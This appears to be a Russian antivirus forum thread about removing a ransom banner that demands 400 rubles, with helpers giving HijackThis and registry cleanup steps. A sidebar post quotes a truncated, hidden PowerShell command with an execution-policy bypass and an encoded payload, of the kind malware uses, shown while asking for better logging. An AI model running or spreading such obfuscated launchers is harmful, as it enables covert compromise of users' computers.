Перейти к содержанию
Jo2000

Помогите! Банер "положи 400р на номер 89853083941 и будет счастье"

Recommended Posts

Jo2000

Добрый день!

Коллега подцепил банер.

При запуске винды выдает положите через терминал 400р на номер 89853083941 и получите на чеке код...

Ну в общем все как обычно

прогнал др.вебом = 0

авз не выличело но че то там подозрительное нашла.

вот ее логи в приложении:

Помогите очень надо!

virusinfo_syscheck.zip

virusinfo_syscure.zip

hijackthis.zip

virusinfo_syscheck.zip

virusinfo_syscure.zip

hijackthis.zip

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Doctor_Petrov

Ну я быстро просмотрел, у вас в автозагрузке C:\Documents and Settings\User\Мои документы\Загрузки\xxx_video_32730.avi.exe

с какой целью? это точно зловред. Надо бы удалить! Можно загрузиться в "безопасном режиме" если просто не получается...

PS Аваст не самая надёжная защита для компьютера...

Кстати, заполучили эту заразу явно кликнув собственными ручками на картинке соответствующего содержания, и разрешив загрузку! Так никакая защита может не спасти.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Doctor_Petrov
@Так никакая защита может не спасти[email protected]

Песок не пробьет на 99%

Ну да, наверное... Просто если человек ведётся на такую фигню и сам загружает вирусы на комп, он может слово "песок" даже не знать) Тут всё дело в шаловливых ручках)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ak_

В таких случаях лучше сразу обращаться на Вирусинфо или на Дефендиум для полноценного лечения.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
K_Mikhail
Добрый день!

Коллега подцепил банер.

При запуске винды выдает положите через терминал 400р на номер 89853083941 и получите на чеке код...

Ну в общем все как обычно

прогнал др.вебом = 0

авз не выличело но че то там подозрительное нашла.

вот ее логи в приложении:

Помогите очень надо!

1. Удалите файл-носитель C:\Documents and Settings\User\Мои документы\Загрузки\xxx_video_32730.avi.exe, предварительно сделав его копию в виде некоего C:\file.ex# для отправки в вируслаб.

2. В HijackThis удалите запись F2 - REG:system.ini: Shell=C:\Documents and Settings\User\Мои документы\Загрузки\xxx_video_32730.avi.exe (после сканирования выделить соответствующий пункт, и нажать Fix Checked).

3. Некоторое подозрение вызывает запись: O4 - HKCU\..\Run: [Explorer] C:\WINDOWS\system32\drivers\TXPlatform.exe. Найдите этот файл на диске и также отправьте в вируслаб на исследование.

4. В виду обнаружения AVZ некоего C:\autorun.inf, рекомендуется отключить автозапуск (добавить в ветвь реестра HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

параметр NoDriveTypeAutoRun=dword:000000ff

после чего просканировать доступные под рукой flash-носители на наличие возможного вредоносного кода.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×